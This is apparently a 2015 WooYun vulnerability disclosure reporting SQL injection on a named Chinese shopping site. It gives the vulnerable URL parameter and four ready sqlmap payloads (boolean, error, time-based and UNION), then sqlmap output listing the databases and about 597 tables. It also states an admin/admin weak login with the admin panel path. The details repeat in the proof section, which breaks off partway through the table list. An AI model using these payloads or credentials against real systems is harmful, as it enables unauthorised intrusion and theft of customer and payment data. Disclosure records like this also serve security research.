当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160722

漏洞标题:爱丽网某主站存在sql注入

相关厂商:aili.com

漏洞作者: 头晕脑壳疼

提交时间:2015-12-14 12:02

修复时间:2015-12-19 12:04

公开时间:2015-12-19 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

别问我怎么知道这个站是爱丽的
<img src=" WooYun: 爱丽网某主站点SQL注入一枚(可执行命令) " alt="" />
注入点</code>http://www.wenji99.com/?m=shop&id=&province=</code>
---
Parameter: province (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: m=shop&id=&province=-6438' OR 9050=9050#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: m=shop&id=&province=-1562' OR 1 GROUP BY CONCAT(0x716b766a71,(SELECT (CASE WHEN (6049=6049) THEN 1 ELSE 0 END)),0x7170626a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: m=shop&id=&province=' AND (SELECT * FROM (SELECT(SLEEP(5)))Tlyb)#
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: m=shop&id=&province=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766a71,0x68474279457668497174,0x7170626a71)#
---
[14:04:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0.12
[14:04:41] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mysql
[*] wenji
[14:04:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.wenji99.com'
五百多张表
Database: wenji
[597 tables]
+---------------------------------------+
| mb_activity |
| mb_activity_315 |
| mb_activity_pro_icon |
| mb_activity_product_list |
| mb_admin |
| mb_admin_group |
| mb_admin_menu |
| mb_admin_operation_log |
| mb_advs |
| mb_advs_con |
| mb_album |
| mb_announcement |
| mb_app_info_push |
| mb_auditing |
| mb_beer_order |
| mb_beer_pro |
| mb_brand |
| mb_brand_cat |
| mb_codeactive |
| mb_comment |
| mb_contags |
| mb_cron |
| mb_custom_cat |
| mb_custom_service |
| mb_defind_1000 |
| mb_defind_1001 |
| mb_defind_1002 |
| mb_defind_1003 |
| mb_defind_1004 |
| mb_defind_1007 |
| mb_defind_1008 |
| mb_defind_1009 |
| mb_defind_1010 |
| mb_defind_1011 |
| mb_defind_1012 |
| mb_defind_1013 |
| mb_defind_1014 |
| mb_defind_1015 |
| mb_defind_1016 |
| mb_defind_1017 |
| mb_defind_1018 |
| mb_defind_1019 |
| mb_defind_1021 |
| mb_defind_1022 |
| mb_defind_1023 |
| mb_defind_1024 |
| mb_defind_1025 |
| mb_defind_1026 |
| mb_defind_1027 |
| mb_defind_1028 |
| mb_defind_1029 |
| mb_defind_1030 |
| mb_defind_1031 |
| mb_defind_1032 |
| mb_defind_1033 |
| mb_defind_1034 |
| mb_defind_1035 |
| mb_defind_1036 |
| mb_defind_1037 |
| mb_defind_1038 |
| mb_defind_1039 |
| mb_defind_1040 |
| mb_defind_1041 |
| mb_defind_1042 |
| mb_defind_1043 |
| mb_defind_1044 |
| mb_defind_1045 |
| mb_defind_1046 |
| mb_defind_1047 |
| mb_defind_1048 |
| mb_defind_1049 |
| mb_defind_1050 |
| mb_defind_1051 |
| mb_defind_1052 |
| mb_defind_1053 |
| mb_defind_1054 |
| mb_defind_1055 |
| mb_defind_1056 |
| mb_defind_1057 |
| mb_defind_1058 |
| mb_defind_1059 |
| mb_defind_1060 |
| mb_defind_1061 |
| mb_defind_1062 |
| mb_defind_1063 |
| mb_defind_1064 |
| mb_defind_1065 |
| mb_defind_1066 |
| mb_defind_1067 |
| mb_defind_1068 |
| mb_defind_1069 |
| mb_defind_1070 |
| mb_defind_1071 |
| mb_defind_1072 |
| mb_defind_1073 |
| mb_defind_1074 |
| mb_defind_1075 |
| mb_defind_1076 |
| mb_defind_1077 |
| mb_defind_1078 |
| mb_defind_1079 |
| mb_defind_1080 |
| mb_defind_1081 |
| mb_defind_1082 |
| mb_defind_1083 |
| mb_defind_1084 |
| mb_defind_1085 |
| mb_defind_1086 |
| mb_defind_1087 |
| mb_defind_1088 |
| mb_defind_1090 |
| mb_defind_1091 |
| mb_defind_1092 |
| mb_defind_1093 |
| mb_defind_1094 |
| mb_defind_1095 |
| mb_defind_1096 |
| mb_defind_1097 |
| mb_defind_1098 |
| mb_defind_1099 |
| mb_defind_1100 |
| mb_defind_1101 |
| mb_defind_1102 |
| mb_defind_1103 |
| mb_defind_1104 |
| mb_defind_1105 |
| mb_defind_1106 |
| mb_defind_1107 |
| mb_defind_1108 |
| mb_defind_1109 |
| mb_defind_1110 |
| mb_defind_1111 |
| mb_defind_1112 |
| mb_defind_1113 |
| mb_defind_1114 |
| mb_defind_1115 |
| mb_defind_1116 |
| mb_defind_1117 |
| mb_defind_1118 |
| mb_defind_1119 |
| mb_defind_1120 |
| mb_defind_1121 |
| mb_defind_1122 |
| mb_defind_1123 |
| mb_defind_1124 |
| mb_defind_1125 |
| mb_defind_1126 |
| mb_defind_1127 |
| mb_defind_1128 |
| mb_defind_1129 |
| mb_defind_1130 |
| mb_defind_1131 |
| mb_defind_1132 |
| mb_defind_1133 |
| mb_defind_1134 |
| mb_defind_1135 |
| mb_defind_1136 |
| mb_defind_1137 |
| mb_defind_1138 |
| mb_defind_1139 |
| mb_defind_1140 |
| mb_defind_1141 |
| mb_defind_1142 |
| mb_defind_1143 |
| mb_defind_1144 |
| mb_defind_1145 |
| mb_defind_1146 |
| mb_defind_1147 |
| mb_defind_1148 |
| mb_defind_1149 |
| mb_defind_1150 |
| mb_defind_1151 |
| mb_defind_1152 |
| mb_defind_1153 |
| mb_defind_1154 |
| mb_defind_1155 |
| mb_defind_1156 |
| mb_defind_1157 |
| mb_defind_1158 |
| mb_defind_1159 |
| mb_defind_1160 |
| mb_defind_1161 |
| mb_defind_1162 |
| mb_defind_1163 |
| mb_defind_1165 |
| mb_defind_1166 |
| mb_defind_1167 |
| mb_defind_1176 |
| mb_defind_1177 |
| mb_defind_1178 |
| mb_defind_1179 |
| mb_defind_1180 |
| mb_defind_1181 |
| mb_defind_1183 |
| mb_defind_1185 |
| mb_defind_1187 |
| mb_defind_1189 |
| mb_defind_1191 |
| mb_defind_1193 |
| mb_defind_1195 |
| mb_defind_1197 |
| mb_defind_1199 |
| mb_defind_1201 |
| mb_defind_1203 |
| mb_defind_1205 |
| mb_defind_1207 |
| mb_defind_1209 |
| mb_defind_1211 |
| mb_defind_1213 |
| mb_defind_1215 |
| mb_defind_1217 |
| mb_defind_1221 |
| mb_defind_1223 |
| mb_defind_1227 |
| mb_defind_1229 |
| mb_defind_1303 |
| mb_defind_1305 |
| mb_defind_1307 |
| mb_defind_1309 |
| mb_defind_1311 |
| mb_defind_1313 |
| mb_defind_1317 |
| mb_defind_1319 |
| mb_defind_1321 |
| mb_defind_1323 |
| mb_defind_1325 |
| mb_defind_1327 |
| mb_defind_1329 |
| mb_defind_1331 |
| mb_defind_1333 |
| mb_defind_1335 |
| mb_defind_1337 |
| mb_defind_615 |
| mb_defind_616 |
| mb_defind_618 |
| mb_defind_633 |
| mb_defind_696 |
| mb_defind_709 |
| mb_defind_744 |
| mb_defind_751 |
| mb_defind_759 |
| mb_defind_761 |
| mb_defind_762 |
| mb_defind_771 |
| mb_defind_805 |
| mb_defind_808 |
| mb_defind_810 |
| mb_defind_812 |
| mb_defind_814 |
| mb_defind_816 |
| mb_defind_817 |
| mb_defind_818 |
| mb_defind_819 |
| mb_defind_820 |
| mb_defind_822 |
| mb_defind_823 |
| mb_defind_824 |
| mb_defind_825 |
| mb_defind_826 |
| mb_defind_827 |
| mb_defind_828 |
| mb_defind_829 |
| mb_defind_831 |
| mb_defind_832 |
| mb_defind_833 |
| mb_defind_834 |
| mb_defind_835 |
| mb_defind_836 |
| mb_defind_837 |
| mb_defind_838 |
| mb_defind_839 |
| mb_defind_840 |
| mb_defind_841 |
| mb_defind_842 |
| mb_defind_843 |
| mb_defind_844 |
| mb_defind_845 |
| mb_defind_846 |
| mb_defind_848 |
| mb_defind_849 |
| mb_defind_850 |
| mb_defind_851 |
| mb_defind_852 |
| mb_defind_853 |
| mb_defind_854 |
| mb_defind_855 |
| mb_defind_856 |
| mb_defind_857 |
| mb_defind_858 |
| mb_defind_859 |
| mb_defind_860 |
| mb_defind_861 |
| mb_defind_862 |
| mb_defind_863 |
| mb_defind_865 |
| mb_defind_866 |
| mb_defind_867 |
| mb_defind_868 |
| mb_defind_869 |
| mb_defind_870 |
| mb_defind_871 |
| mb_defind_872 |
| mb_defind_873 |
| mb_defind_874 |
| mb_defind_875 |
| mb_defind_876 |
| mb_defind_877 |
| mb_defind_878 |
| mb_defind_879 |
| mb_defind_880 |
| mb_defind_881 |
| mb_defind_882 |
| mb_defind_883 |
| mb_defind_884 |
| mb_defind_885 |
| mb_defind_886 |
| mb_defind_887 |
| mb_defind_888 |
| mb_defind_889 |
| mb_defind_890 |
| mb_defind_891 |
| mb_defind_892 |
| mb_defind_893 |
| mb_defind_894 |
| mb_defind_895 |
| mb_defind_896 |
| mb_defind_897 |
| mb_defind_898 |
| mb_defind_899 |
| mb_defind_900 |
| mb_defind_901 |
| mb_defind_902 |
| mb_defind_903 |
| mb_defind_904 |
| mb_defind_905 |
| mb_defind_906 |
| mb_defind_907 |
| mb_defind_908 |
| mb_defind_909 |
| mb_defind_910 |
| mb_defind_911 |
| mb_defind_912 |
| mb_defind_913 |
| mb_defind_914 |
| mb_defind_915 |
| mb_defind_916 |
| mb_defind_917 |
| mb_defind_918 |
| mb_defind_919 |
| mb_defind_920 |
| mb_defind_921 |
| mb_defind_923 |
| mb_defind_924 |
| mb_defind_925 |
| mb_defind_926 |
| mb_defind_927 |
| mb_defind_928 |
| mb_defind_929 |
| mb_defind_930 |
| mb_defind_931 |
| mb_defind_932 |
| mb_defind_933 |
| mb_defind_934 |
| mb_defind_935 |
| mb_defind_936 |
| mb_defind_937 |
| mb_defind_938 |
| mb_defind_939 |
| mb_defind_940 |
| mb_defind_941 |
| mb_defind_942 |
| mb_defind_943 |
| mb_defind_944 |
| mb_defind_945 |
| mb_defind_946 |
| mb_defind_947 |
| mb_defind_948 |
| mb_defind_949 |
| mb_defind_950 |
| mb_defind_951 |
| mb_defind_952 |
| mb_defind_953 |
| mb_defind_954 |
| mb_defind_955 |
| mb_defind_956 |
| mb_defind_957 |
| mb_defind_958 |
| mb_defind_959 |
| mb_defind_960 |
| mb_defind_961 |
| mb_defind_962 |
| mb_defind_963 |
| mb_defind_964 |
| mb_defind_965 |
| mb_defind_966 |
| mb_defind_967 |
| mb_defind_968 |
| mb_defind_969 |
| mb_defind_970 |
| mb_defind_971 |
| mb_defind_972 |
| mb_defind_973 |
| mb_defind_974 |
| mb_defind_975 |
| mb_defind_976 |
| mb_defind_977 |
| mb_defind_978 |
| mb_defind_979 |
| mb_defind_980 |
| mb_defind_981 |
| mb_defind_982 |
| mb_defind_983 |
| mb_defind_984 |
| mb_defind_985 |
| mb_defind_986 |
| mb_defind_987 |
| mb_defind_988 |
| mb_defind_989 |
| mb_defind_990 |
| mb_defind_991 |
| mb_defind_992 |
| mb_defind_993 |
| mb_defind_994 |
| mb_defind_995 |
| mb_defind_996 |
| mb_defind_997 |
| mb_defind_998 |
| mb_defind_999 |
| mb_delivery_address |
| mb_discount |
| mb_discount_get |
| mb_district |
| mb_fast_mail |
| mb_feed |
| mb_filter_keyword |
| mb_logistics_temp |
| mb_logistics_temp_con |
| mb_mail_mod |
| mb_mail_record |
| mb_match |
| mb_member |
| mb_member_count |
| mb_member_discount |
| mb_message |
| mb_nav_menu |
| mb_news |
| mb_news_data |
| mb_newscat |
| mb_package |
| mb_page_rec |
| mb_page_view |
| mb_page_view_201511 |
| mb_page_view_201512 |
| mb_payment_banks |
| mb_payment_card |
| mb_payment_cashflow |
| mb_payment_cashpickup |
| mb_payment_member |
| mb_payment_service_fee |
| mb_payment_type |
| mb_payment_user |
| mb_points |
| mb_points_cat |
| mb_points_goods |
| mb_points_log |
| mb_points_order |
| mb_product_cart |
| mb_product_cat |
| mb_product_cat_note |
| mb_product_comment |
| mb_product_consult |
| mb_product_consult_cat |
| mb_product_delivery |
| mb_product_detail |
| mb_product_discount |
| mb_product_discount_member |
| mb_product_goodsid |
| mb_product_invoice |
| mb_product_order |
| mb_product_order_allot |
| mb_product_order_discount |
| mb_product_order_pro |
| mb_product_rebeat |
| mb_product_report |
| mb_product_report_subject |
| mb_product_sale |
| mb_product_setmeal |
| mb_product_shop_more |
| mb_product_shop_more_price |
| mb_product_union |
| mb_product_union_detail |
| mb_product_user_link |
| mb_products |
| mb_property |
| mb_property_value |
| mb_property_value_template |
| mb_rebate |
| mb_rebate_status |
| mb_reg_vercode |
| mb_remind |
| mb_remind_cat |
| mb_reserve_username |
| mb_return |
| mb_return_goods |
| mb_search_word |
| mb_session |
| mb_share_url |
| mb_shipping_address |
| mb_shop |
| mb_shop_ad |
| mb_shop_cat |
| mb_shop_domin |
| mb_shop_earnest |
| mb_shop_free_shipping |
| mb_shop_free_shipping_goods |
| mb_shop_full_reduce |
| mb_shop_grade |
| mb_shop_id |
| mb_shop_index |
| mb_shop_link |
| mb_shop_member |
| mb_shop_navigation |
| mb_shop_product |
| mb_shop_setting |
| mb_shop_template |
| mb_shops_news |
| mb_site_spread |
| mb_sms_record_temp |
| mb_sns |
| mb_sns_comment |
| mb_sns_friend |
| mb_sns_shareproduct |
| mb_sns_shareproduct_info |
| mb_sns_shareshop |
| mb_stop_ip |
| mb_sub_domain |
| mb_sub_user_credits |
| mb_subscribe |
| mb_supplier |
| mb_tags |
| mb_talk |
| mb_tg |
| mb_tg_cat |
| mb_tg_comment |
| mb_tg_member |
| mb_tg_order |
| mb_tg_product |
| mb_tg_product_comment |
| mb_tg_product_setmeal |
| mb_ticket |
| mb_user_comment |
| mb_user_connected |
| mb_user_credit_bill |
| mb_user_credits |
| mb_user_group |
| mb_user_purchases |
| mb_user_read_rec |
| mb_virtual_data |
| mb_vote |
| mb_warehouse |
| mb_web_con |
| mb_web_con_group |
| mb_web_config |
| mb_web_link |
| sh_brand |
| sh_brand_category |
| sh_category |
| sh_goods |
| sh_goods_car |
| sh_manage |
| sh_schedule |
| sh_spec |
| sh_spec_photo |
| sh_user |
| sh_user_lock |
| ucar_faq |
| wx_areply |
| wx_diymen_class |
| wx_img |
| wx_img_double |
| wx_img_double_list |
| wx_img_single |
| wx_keyword |
| wx_member |
| wx_service_logs |
| wx_service_user |
| wx_text |
| wx_users |
| wx_wechat_group |
| wx_wechat_group_list |
| wx_wsite_article |
| wx_wsite_articlei |
| wx_wsite_classify |
| wx_wsite_set |
| wx_wsite_slideshow |
| wx_wxacc |
| wx_wxuser |
+---------------------------------------+

1.png


密码还是弱口令

admin admin
http://www.wenji99.com/dlq9J15DshW5f/index.php


2.png

3.png


漏洞证明:

别问我怎么知道这个站是爱丽的
<img src=" WooYun: 爱丽网某主站点SQL注入一枚(可执行命令) " alt="" />
注入点</code>http://www.wenji99.com/?m=shop&id=&province=</code>
---
Parameter: province (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: m=shop&id=&province=-6438' OR 9050=9050#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: m=shop&id=&province=-1562' OR 1 GROUP BY CONCAT(0x716b766a71,(SELECT (CASE WHEN (6049=6049) THEN 1 ELSE 0 END)),0x7170626a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: m=shop&id=&province=' AND (SELECT * FROM (SELECT(SLEEP(5)))Tlyb)#
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: m=shop&id=&province=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766a71,0x68474279457668497174,0x7170626a71)#
---
[14:04:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0.12
[14:04:41] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mysql
[*] wenji
[14:04:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.wenji99.com'
五百多张表
Database: wenji
[597 tables]
+---------------------------------------+
| mb_activity |
| mb_activity_315 |
| mb_activity_pro_icon |
| mb_activity_product_list |
| mb_admin |
| mb_admin_group |
| mb_admin_menu |
| mb_admin_operation_log |
| mb_advs |
| mb_advs_con |
| mb_album |
| mb_announcement |
| mb_app_info_push |
| mb_auditing |
| mb_beer_order |
| mb_beer_pro |
| mb_brand |
| mb_brand_cat |
| mb_codeactive |
| mb_comment |
| mb_contags |
| mb_cron |
| mb_custom_cat |
| mb_custom_service |
| mb_defind_1000 |
| mb_defind_1001 |
| mb_defind_1002 |
| mb_defind_1003 |
| mb_defind_1004 |
| mb_defind_1007 |
| mb_defind_1008 |
| mb_defind_1009 |
| mb_defind_1010 |
| mb_defind_1011 |
| mb_defind_1012 |
| mb_defind_1013 |
| mb_defind_1014 |
| mb_defind_1015 |
| mb_defind_1016 |
| mb_defind_1017 |
| mb_defind_1018 |
| mb_defind_1019 |
| mb_defind_1021 |
| mb_defind_1022 |
| mb_defind_1023 |
| mb_defind_1024 |
| mb_defind_1025 |
| mb_defind_1026 |
| mb_defind_1027 |
| mb_defind_1028 |
| mb_defind_1029 |
| mb_defind_1030 |
| mb_defind_1031 |
| mb_defind_1032 |
| mb_defind_1033 |
| mb_defind_1034 |
| mb_defind_1035 |
| mb_defind_1036 |
| mb_defind_1037 |
| mb_defind_1038 |
| mb_defind_1039 |
| mb_defind_1040 |
| mb_defind_1041 |
| mb_defind_1042 |
| mb_defind_1043 |
| mb_defind_1044 |
| mb_defind_1045 |
| mb_defind_1046 |
| mb_defind_1047 |
| mb_defind_1048 |
| mb_defind_1049 |
| mb_defind_1050 |
| mb_defind_1051 |
| mb_defind_1052 |
| mb_defind_1053 |
| mb_defind_1054 |
| mb_defind_1055 |
| mb_defind_1056 |
| mb_defind_1057 |
| mb_defind_1058 |
| mb_defind_1059 |
| mb_defind_1060 |
| mb_defind_1061 |
| mb_defind_1062 |
| mb_defind_1063 |
| mb_defind_1064 |
| mb_defind_1065 |
| mb_defind_1066 |
| mb_defind_1067 |
| mb_defind_1068 |
| mb_defind_1069 |
| mb_defind_1070 |
| mb_defind_1071 |
| mb_defind_1072 |
| mb_defind_1073 |
| mb_defind_1074 |
| mb_defind_1075 |
| mb_defind_1076 |
| mb_defind_1077 |
| mb_defind_1078 |
| mb_defind_1079 |
| mb_defind_1080 |
| mb_defind_1081 |
| mb_defind_1082 |
| mb_defind_1083 |
| mb_defind_1084 |
| mb_defind_1085 |
| mb_defind_1086 |
| mb_defind_1087 |
| mb_defind_1088 |
| mb_defind_1090 |
| mb_defind_1091 |
| mb_defind_1092 |
| mb_defind_1093 |
| mb_defind_1094 |
| mb_defind_1095 |
| mb_defind_1096 |
| mb_defind_1097 |
| mb_defind_1098 |
| mb_defind_1099 |
| mb_defind_1100 |
| mb_defind_1101 |
| mb_defind_1102 |
| mb_defind_1103 |
| mb_defind_1104 |
| mb_defind_1105 |
| mb_defind_1106 |
| mb_defind_1107 |
| mb_defind_1108 |
| mb_defind_1109 |
| mb_defind_1110 |
| mb_defind_1111 |
| mb_defind_1112 |
| mb_defind_1113 |
| mb_defind_1114 |
| mb_defind_1115 |
| mb_defind_1116 |
| mb_defind_1117 |
| mb_defind_1118 |
| mb_defind_1119 |
| mb_defind_1120 |
| mb_defind_1121 |
| mb_defind_1122 |
| mb_defind_1123 |
| mb_defind_1124 |
| mb_defind_1125 |
| mb_defind_1126 |
| mb_defind_1127 |
| mb_defind_1128 |
| mb_defind_1129 |
| mb_defind_1130 |
| mb_defind_1131 |
| mb_defind_1132 |
| mb_defind_1133 |
| mb_defind_1134 |
| mb_defind_1135 |
| mb_defind_1136 |
| mb_defind_1137 |
| mb_defind_1138 |
| mb_defind_1139 |
| mb_defind_1140 |
| mb_defind_1141 |
| mb_defind_1142 |
| mb_defind_1143 |
| mb_defind_1144 |
| mb_defind_1145 |
| mb_defind_1146 |
| mb_defind_1147 |
| mb_defind_1148 |
| mb_defind_1149 |
| mb_defind_1150 |
| mb_defind_1151 |
| mb_defind_1152 |
| mb_defind_1153 |
| mb_defind_1154 |
| mb_defind_1155 |
| mb_defind_1156 |
| mb_defind_1157 |
| mb_defind_1158 |
| mb_defind_1159 |
| mb_defind_1160 |
| mb_defind_1161 |
| mb_defind_1162 |
| mb_defind_1163 |
| mb_defind_1165 |
| mb_defind_1166 |
| mb_defind_1167 |
| mb_defind_1176 |
| mb_defind_1177 |
| mb_defind_1178 |
| mb_defind_1179 |
| mb_defind_1180 |
| mb_defind_1181 |
| mb_defind_1183 |
| mb_defind_1185 |
| mb_defind_1187 |
| mb_defind_1189 |
| mb_defind_1191 |
| mb_defind_1193 |
| mb_defind_1195 |
| mb_defind_1197 |
| mb_defind_1199 |
| mb_defind_1201 |
| mb_defind_1203 |
| mb_defind_1205 |
| mb_defind_1207 |
| mb_defind_1209 |
| mb_defind_1211 |
| mb_defind_1213 |
| mb_defind_1215 |
| mb_defind_1217 |
| mb_defind_1221 |
| mb_defind_1223 |
| mb_defind_1227 |
| mb_defind_1229 |
| mb_defind_1303 |
| mb_defind_1305 |
| mb_defind_1307 |
| mb_defind_1309 |
| mb_defind_1311 |
| mb_defind_1313 |
| mb_defind_1317 |
| mb_defind_1319 |
| mb_defind_1321 |
| mb_defind_1323 |
| mb_defind_1325 |
| mb_defind_1327 |
| mb_defind_1329 |
| mb_defind_1331 |
| mb_defind_1333 |
| mb_defind_1335 |
| mb_defind_1337 |
| mb_defind_615 |
| mb_defind_616 |
| mb_defind_618 |
| mb_defind_633 |
| mb_defind_696 |
| mb_defind_709 |
| mb_defind_744 |
| mb_defind_751 |
| mb_defind_759 |
| mb_defind_761 |
| mb_defind_762 |
| mb_defind_771 |
| mb_defind_805 |
| mb_defind_808 |
| mb_defind_810 |
| mb_defind_812 |
| mb_defind_814 |
| mb_defind_816 |
| mb_defind_817 |
| mb_defind_818 |
| mb_defind_819 |
| mb_defind_820 |
| mb_defind_822 |
| mb_defind_823 |
| mb_defind_824 |
| mb_defind_825 |
| mb_defind_826 |
| mb_defind_827 |
| mb_defind_828 |
| mb_defind_829 |
| mb_defind_831 |
| mb_defind_832 |
| mb_defind_833 |
| mb_defind_834 |
| mb_defind_835 |
| mb_defind_836 |
| mb_defind_837 |
| mb_defind_838 |
| mb_defind_839 |
| mb_defind_840 |
| mb_defind_841 |
| mb_defind_842 |
| mb_defind_843 |
| mb_defind_844 |
| mb_defind_845 |
| mb_defind_846 |
| mb_defind_848 |
| mb_defind_849 |
| mb_defind_850 |
| mb_defind_851 |
| mb_defind_852 |
| mb_defind_853 |
| mb_defind_854 |
| mb_defind_855 |
| mb_defind_856 |
| mb_defind_857 |
| mb_defind_858 |
| mb_defind_859 |
| mb_defind_860 |
| mb_defind_861 |
| mb_defind_862 |
| mb_defind_863 |
| mb_defind_865 |
| mb_defind_866 |
| mb_defind_867 |
| mb_defind_868 |
| mb_defind_869 |
| mb_defind_870 |
| mb_defind_871 |
| mb_defind_872 |
| mb_defind_873 |
| mb_defind_874 |
| mb_defind_875 |
| mb_defind_876 |
| mb_defind_877 |
| mb_defind_878 |
| mb_defind_879 |
| mb_defind_880 |
| mb_defind_881 |
| mb_defind_882 |
| mb_defind_883 |
| mb_defind_884 |
| mb_defind_885 |
| mb_defind_886 |
| mb_defind_887 |
| mb_defind_888 |
| mb_defind_889 |
| mb_defind_890 |
| mb_defind_891 |
| mb_defind_892 |
| mb_defind_893 |
| mb_defind_894 |
| mb_defind_895 |
| mb_defind_896 |
| mb_defind_897 |
| mb_defind_898 |
| mb_defind_899 |
| mb_defind_900 |
| mb_defind_901 |
| mb_defind_902 |
| mb_defind_903 |
| mb_defind_904 |
| mb_defind_905 |
| mb_defind_906 |
| mb_defind_907 |
| mb_defind_908 |
| mb_defind_909 |
| mb_defind_910 |
| mb_defind_911 |
| mb_defind_912 |
| mb_defind_913 |
| mb_defind_914 |
| mb_defind_915 |
| mb_defind_916 |
| mb_defind_917 |
| mb_defind_918 |
| mb_defind_919 |
| mb_defind_920 |
| mb_defind_921 |
| mb_defind_923 |
| mb_defind_924 |
| mb_defind_925 |
| mb_defind_926 |
| mb_defind_927 |
| mb_defind_928 |
| mb_defind_929 |
| mb_defind_930 |
| mb_defind_931 |
| mb_defind_932 |
| mb_defind_933 |
| mb_defind_934 |
| mb_defind_935 |
| mb_defind_936 |
| mb_defind_937 |
| mb_defind_938 |
| mb_defind_939 |
| mb_defind_940 |
| mb_defind_941 |
| mb_defind_942 |
| mb_defind_943 |
| mb_defind_944 |
| mb_defind_945 |
| mb_defind_946 |
| mb_defind_947 |
| mb_defind_948 |
| mb_defind_949 |
| mb_defind_950 |
| mb_defind_951 |
| mb_defind_952 |
| mb_defind_953 |
| mb_defind_954 |
| mb_defind_955 |
| mb_defind_956 |
| mb_defind_957 |
| mb_defind_958 |
| mb_defind_959 |
| mb_defind_960 |
| mb_defind_961 |
| mb_defind_962 |
| mb_defind_963 |
| mb_defind_964 |
| mb_defind_965 |
| mb_defind_966 |
| mb_defind_967 |
| mb_defind_968 |
| mb_defind_969 |
| mb_defind_970 |
| mb_defind_971 |
| mb_defind_972 |
| mb_defind_973 |
| mb_defind_974 |
| mb_defind_975 |
| mb_defind_976 |
| mb_defind_977 |
| mb_defind_978 |
| mb_defind_979 |
| mb_defind_980 |
| mb_defind_981 |
| mb_defind_982 |
| mb_defind_983 |
| mb_defind_984 |
| mb_defind_985 |
| mb_defind_986 |
| mb_defind_987 |
| mb_defind_988 |
| mb_defind_989 |
| mb_defind_990 |
| mb_defind_991 |
| mb_defind_992 |
| mb_defind_993 |
| mb_defind_994 |
| mb_defind_995 |
| mb_defind_996 |
| mb_defind_997 |
| mb_defind_998 |
| mb_defind_999 |
| mb_delivery_address |
| mb_discount |
| mb_discount_get |
| mb_district |
| mb_fast_mail |
| mb_feed |
| mb_filter_keyword |
| mb_logistics_temp |
| mb_logistics_temp_con |
| mb_mail_mod |
| mb_mail_record |
| mb_match |
| mb_member |
| mb_member_count |
| mb_member_discount |
| mb_message |
| mb_nav_menu |
| mb_news |
| mb_news_data |
| mb_newscat |
| mb_package |
| mb_page_rec |
| mb_page_view |
| mb_page_view_201511 |
| mb_page_view_201512 |
| mb_payment_banks |
| mb_payment_card |
| mb_payment_cashflow |
| mb_payment_cashpickup |
| mb_payment_member |
| mb_payment_service_fee |
| mb_payment_type |
| mb_payment_user |
| mb_points |
| mb_points_cat |
| mb_points_goods |
| mb_points_log |
| mb_points_order |
| mb_product_cart |
| mb_product_cat |
| mb_product_cat_note |
| mb_product_comment |
| mb_product_consult |
| mb_product_consult_cat |
| mb_product_delivery |
| mb_product_detail |
| mb_product_discount |
| mb_product_discount_member |
| mb_product_goodsid |
| mb_product_invoice |
| mb_product_order |
| mb_product_order_allot |
| mb_product_order_discount |
| mb_product_order_pro |
| mb_product_rebeat |
| mb_product_report |
| mb_product_report_subject |
| mb_product_sale |
| mb_product_setmeal |
| mb_product_shop_more |
| mb_product_shop_more_price |
| mb_product_union |
| mb_product_union_detail |
| mb_product_user_link |
| mb_products |
| mb_property |
| mb_property_value |
| mb_property_value_template |
| mb_rebate |
| mb_rebate_status |
| mb_reg_vercode |
| mb_remind |
| mb_remind_cat |
| mb_reserve_username |
| mb_return |
| mb_return_goods |
| mb_search_word |
| mb_session |
| mb_share_url |
| mb_shipping_address |
| mb_shop |
| mb_shop_ad |
| mb_shop_cat |
| mb_shop_domin |
| mb_shop_earnest |
| mb_shop_free_shipping |
| mb_shop_free_shipping_goods |
| mb_shop_full_reduce |
| mb_shop_grade |
| mb_shop_id |
| mb_shop_index |
| mb_shop_link |
| mb_shop_member |
| mb_shop_navigation |
| mb_shop_product |
| mb_shop_setting |
| mb_shop_template |
| mb_shops_news |
| mb_site_spread |
| mb_sms_record_temp |
| mb_sns |
| mb_sns_comment |
| mb_sns_friend |
| mb_sns_shareproduct |
| mb_sns_shareproduct_info |
| mb_sns_shareshop |
| mb_stop_ip |
| mb_sub_domain |
| mb_sub_user_credits |
| mb_subscribe |
| mb_supplier |
| mb_tags |
| mb_talk |
| mb_tg |
| mb_tg_cat |
| mb_tg_comment |
| mb_tg_member |
| mb_tg_order |
| mb_tg_product |
| mb_tg_product_comment |
| mb_tg_product_setmeal |
| mb_ticket |
| mb_user_comment |
| mb_user_connected |
| mb_user_credit_bill |
| mb_user_credits |
| mb_user_group |
| mb_user_purchases |
| mb_user_read_rec |
| mb_virtual_data |
| mb_vote |
| mb_warehouse |
| mb_web_con |
| mb_web_con_group |
| mb_web_config |
| mb_web_link |
| sh_brand |
| sh_brand_category |
| sh_category |
| sh_goods |
| sh_goods_car |
| sh_manage |
| sh_schedule |
| sh_spec |
| sh_spec_photo |
| sh_user |
| sh_user_lock |
| ucar_faq |
| wx_areply |
| wx_diymen_class |
| wx_img |
